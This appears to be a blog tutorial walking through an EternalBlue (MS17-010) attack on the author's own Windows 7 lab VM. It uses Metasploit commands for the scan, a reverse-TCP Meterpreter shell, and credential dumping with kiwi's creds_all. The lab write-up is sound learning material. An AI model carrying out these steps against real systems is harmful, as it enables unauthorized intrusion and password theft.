EternalBlue Vulnerability Exploitation

DISCLAIMER!

This content is intended solely for educational and ethical purposes. This activity is conducted with permission. All activities related to cybersecurity must comply with available regulations. The author (me) is not responsible for any misuse or illegal activities performed using the knowledge shared here. Any actions taken by the readers using this info are at the reader’s own risk.  

EternalBlue Vulnerability Exploitation

EternalBlue is a software initially developed by the NSA (National Security Agency) of the United States, but it was leaked by the Shadow Brokers in April 2017. EternalBlue vulnerability is a vulnerability that is based on a Microsoft Windows vulnerability in the implementation of SMB (Server Message Block) protocol, specifically for SMBv1. When the hackers exploit this vulnerability to download files from the target, the user of the target computer usually will not feel or detect anything off. Therefore, it is very dangerous.

Image source: https://www.avast.com/c-eternalblue

Today, we will try to exploit this vulnerability to get into a Windows 7 system. For practice purpose, I set up a Windows 7 Ultimate VM to be the target (I will not explain the installation steps here). 

Before starting our VM for Windows 7 and Kali Linux, we need to change both of their network settings to use Host-only Adapter. You can also use NAT network if you want to. Just make sure that the target VM and Kali Linux have different IP.

 

TARGET PREPARATION

This step is only for preparing the target that we want to exploit for practice. In real case scenario, the target is already there.

First, after we boot the Windows 7 VM, go to command prompt and type systeminfo to see whether the Windows 7 is vulnerable to EternalBlue.

After that, see whether there is already a hotfix or patch for EternalBlue vulnerability. If the hotfix name starts with KB401..., then it is already patched. However, if it is not, just as the picture below, then it is not patched, so we can use this VM as our practice target machine.

We also need to see the IP of our target machine by using ipconfig in the command prompt.

Next, to make our process easier, we need to disable the Windows 7 firewall. Click the start button and search for Windows Firewall. Click Windows Firewall.

Go to Turn Windows Firewall on or off.

After that, close all the firewalls and click OK.

TARGET EXPLOITATION

Now, we can go to Kali Linux to use Metasploit to exploit the EternalBlue vulnerability. Important: Do not shut down the target Windows 7 VM!

After going to Kali Linux, we will now simulate the exploitation. We will pretend to only know the target IP. First, we need to scan for the vulnerability and whether port 445 (SMB) is open in target machine with nmap -p 445 --script smb-vuln-ms17-010 <target-ip>.

From the scanning, we know that the target is vulnerable to EternalBlue. We also get the CVE code, which is CVE-2017-0143. Good enough, now we will proceed to exploit using Metasploit. Start it using msfconsole.

After that, type search cve-2017-0143 to see the exploit and auxiliary scanner that we can use. We will use use exploit/windows/smb/ms17_010_eternalblue later for the exploitation.

Because our target system is Windows x64, then we can search the payload that we can use by typing use payload windows/x64.

For now, we will use windows/x64/meterpreter/reverse_tcp as our payload (it is the default one). Now, we will type use exploit/windows/smb/ms17_010_eternalblue and see what parameters that we need to set.

Okay, so from the picture above, we basically only need to set RHOSTS with the target IP and LHOST as Kali IP as everything is already configured. The commands are set RHOST <target-ip> and set LHOST <your-kali-ip>.

Then, we will type run and wait for some time. If it is successful, then we can get a Meterpreter shell.

Now, we are officially in the target system and we can execute commands in it. We can use sysinfo to see the OS version, architecture, and so on. We can use getuid to see which user you are running as. (The NT AUTHORITY\SYSTEM is actually the highest privilege on Windows!).

 

 Next, we can also load kiwi and type creds_all to get all the passwords stored in the system.

We can also use ls to browse the file system. Therefore, we can easily upload and download file from the system. After all are done, you can quit the meterpreter shell and msfconsole.

 

CLOSING REMARKS

As you can see, the EternalBlue vulnerability is very dangerous because the target system does not feel anything when the exploitation happens. This hands-on practice is for educational purposes only, so please do not try it with others computers without legal permissions. Thank you for reading this far and see you in our next post (I guess we will stick with Metasploit for a while haha!)